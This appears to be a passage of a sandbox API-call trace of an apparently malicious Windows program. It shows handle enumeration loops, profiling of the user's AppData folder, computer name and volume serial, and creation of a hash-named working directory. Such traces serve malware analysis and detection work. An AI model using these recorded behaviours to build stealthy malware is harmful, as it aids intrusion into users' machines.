1 [0043.523] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.524] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.524] CloseHandle (hObject=0x1cc) returned 1 [0043.524] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.525] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.525] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.525] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.525] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.525] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.525] CloseHandle (hObject=0x1c8) returned 1 [0043.525] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.525] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.526] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.526] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.526] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.526] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.526] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.526] CloseHandle (hObject=0x1cc) returned 1 [0043.526] CloseHandle (hObject=0x1c8) returned 1 [0043.526] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.527] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.527] CloseHandle (hObject=0x1cc) returned 1 [0043.527] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.528] CloseHandle (hObject=0x1cc) returned 1 [0043.528] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.528] CloseHandle (hObject=0x1cc) returned 1 [0043.528] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.528] CloseHandle (hObject=0x1cc) returned 1 [0043.528] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.528] CloseHandle (hObject=0x1cc) returned 1 [0043.528] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.528] CloseHandle (hObject=0x1cc) returned 1 [0043.528] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.528] CloseHandle (hObject=0x1cc) returned 1 [0043.528] CloseHandle (hObject=0x1c8) returned 1 [0043.528] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.529] CloseHandle (hObject=0x1c8) returned 1 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.529] CloseHandle (hObject=0x1c8) returned 1 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.529] CloseHandle (hObject=0x1c8) returned 1 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.529] CloseHandle (hObject=0x1c8) returned 1 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.529] CloseHandle (hObject=0x1c8) returned 1 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.529] CloseHandle (hObject=0x1c8) returned 1 [0043.529] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.529] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.530] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.530] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.530] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.530] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.530] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.530] CloseHandle (hObject=0x1cc) returned 1 [0043.530] CloseHandle (hObject=0x1c8) returned 1 [0043.530] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.531] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.531] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.531] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.531] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.531] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.531] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.531] CloseHandle (hObject=0x1cc) returned 1 [0043.531] CloseHandle (hObject=0x1c8) returned 1 [0043.532] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.532] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.532] CloseHandle (hObject=0x1cc) returned 1 [0043.532] CloseHandle (hObject=0x1c8) returned 1 [0043.532] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.532] CloseHandle (hObject=0x1cc) returned 1 [0043.532] CloseHandle (hObject=0x1c8) returned 1 [0043.532] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.532] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.532] CloseHandle (hObject=0x1cc) returned 1 [0043.532] CloseHandle (hObject=0x1c8) returned 1 [0043.532] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.532] CloseHandle (hObject=0x1cc) returned 1 [0043.532] CloseHandle (hObject=0x1c8) returned 1 [0043.533] CloseHandle (hObject=0x1cc) returned 1 [0043.533] CloseHandle (hObject=0x1c8) returned 1 [0043.533] CloseHandle (hObject=0x1cc) returned 1 [0043.533] CloseHandle (hObject=0x1c8) returned 1 [0043.533] CloseHandle (hObject=0x1cc) returned 1 [0043.533] CloseHandle (hObject=0x1c8) returned 1 [0043.533] CloseHandle (hObject=0x1cc) returned 1 [0043.533] CloseHandle (hObject=0x1c8) returned 1 [0043.533] CloseHandle (hObject=0x1cc) returned 1 [0043.533] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.534] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.534] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.534] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.534] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.534] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.534] CloseHandle (hObject=0x1c8) returned 1 [0043.534] CloseHandle (hObject=0x1cc) returned 1 [0043.535] CloseHandle (hObject=0x1c8) returned 1 [0043.535] CloseHandle (hObject=0x1cc) returned 1 [0043.535] CloseHandle (hObject=0x1c8) returned 1 [0043.535] CloseHandle (hObject=0x1cc) returned 1 [0043.535] CloseHandle (hObject=0x1c8) returned 1 [0043.535] CloseHandle (hObject=0x1cc) returned 1 [0043.535] CloseHandle (hObject=0x1c8) returned 1 [0043.539] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x189bb0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0043.541] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0043.541] wcslen (_String="*") returned 0x1 [0043.541] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x189fc0 | out: lpFindFileData=0x189fc0) returned 0x6677e0 [0043.541] wcslen (_String=".") returned 0x1 [0043.541] FindNextFileW (in: hFindFile=0x6677e0, lpFindFileData=0x189fc0 | out: lpFindFileData=0x189fc0) returned 1 [0043.541] wcslen (_String="..") returned 0x2 [0043.541] wcslen (_String="Adobe") returned 0x5 [0043.541] wcslen (_String="Application Data") returned 0x10 [0043.541] FindNextFileW (in: hFindFile=0x6677e0, lpFindFileData=0x189fc0 | out: lpFindFileData=0x189fc0) returned 1 [0043.541] wcslen (_String="Apps") returned 0x4 [0043.541] wcslen (_String="Deployment") returned 0xa [0043.541] wcslen (_String="Google") returned 0x6 [0043.541] wcslen (_String="History") returned 0x7 [0043.542] wcslen (_String="Microsoft") returned 0x9 [0043.542] wcslen (_String="Microsoft Help") returned 0xe [0043.542] wcslen (_String="Mozilla") returned 0x7 [0043.542] wcslen (_String="Temp") returned 0x4 [0043.542] wcslen (_String="Temporary Internet Files") returned 0x18 [0043.542] FindNextFileW (in: hFindFile=0x6677e0, lpFindFileData=0x189fc0 | out: lpFindFileData=0x189fc0) returned 1 [0043.542] wcslen (_String="VirtualStore") returned 0xc [0043.542] FindClose (in: hFindFile=0x6677e0 | out: hFindFile=0x6677e0) returned 1 [0043.542] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18a2cc | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0043.542] GetComputerNameW (in: lpBuffer=0x18a6dc, nSize=0x18a96c | out: lpBuffer="XDUWTFONO", nSize=0x18a96c) returned 1 [0043.542] CryptAcquireContextW (in: phProv=0x2f9f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9f8*=0x583968) returned 1 [0043.543] CryptAcquireContextW (in: phProv=0x2f9f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9f8*=0x5839f0) returned 1 [0043.543] CryptCreateHash (in: hProv=0x5839f0, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x2f9fc | out: phHash=0x2f9fc) returned 1 [0043.543] CryptHashData (hHash=0x6677e0, pbData=0x2f6c0, dwDataLen=0x12, dwFlags=0x0) returned 1 [0043.543] CryptGetHashParam (in: hHash=0x6677e0, dwParam=0x4, pbData=0x18a274, pdwDataLen=0x18a278, dwFlags=0x0 | out: pbData=0x18a274, pdwDataLen=0x18a278) returned 1 [0043.543] CryptGetHashParam (in: hHash=0x6677e0, dwParam=0x2, pbData=0x2f6e0, pdwDataLen=0x18a278, dwFlags=0x0 | out: pbData=0x2f6e0, pdwDataLen=0x18a278) returned 1 [0043.543] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0043.543] wcslen (_String="454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4") returned 0x28 [0043.544] CreateDirectoryW (lpPathName="C:" (normalized: "c:"), lpSecurityAttributes=0x0) returned 0 [0043.544] GetLastError () returned 0xb7 [0043.544] CreateDirectoryW (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0043.544] GetLastError () returned 0xb7 [0043.544] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), lpSecurityAttributes=0x0) returned 0 [0043.544] GetLastError () returned 0xb7 [0043.544] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), lpSecurityAttributes=0x0) returned 0 [0043.544] GetLastError () returned 0xb7 [0043.544] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0043.544] GetLastError () returned 0xb7 [0043.544] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4"), lpSecurityAttributes=0x0) returned 1 [0043.545] CryptDestroyHash (hHash=0x6677e0) returned 1 [0043.545] CryptReleaseContext (hProv=0x5839f0, dwFlags=0x0) returned 1 [0043.545] GetSystemDirectoryW (in: lpBuffer=0x18a6d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0043.545] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a8d8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a8d8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0043.545] wcslen (_String="container.dat") returned 0xd [0043.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0043.545] GetEnvironmentVariableA (in: lpName="bound", lpBuffer=0x18a8a0, nSize=0x3f | out: lpBuffer="941401012") returned 0x9 [0043.545] atol (_Str="941401012") returned 941401012 [0043.546] VirtualQuery (in: lpAddress=0x560000, lpBuffer=0x18a880, dwLength=0x1c | out: lpBuffer=0x18a880*(BaseAddress=0x560000, AllocationBase=0x560000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.546] strlen (_Str="cfg") returned 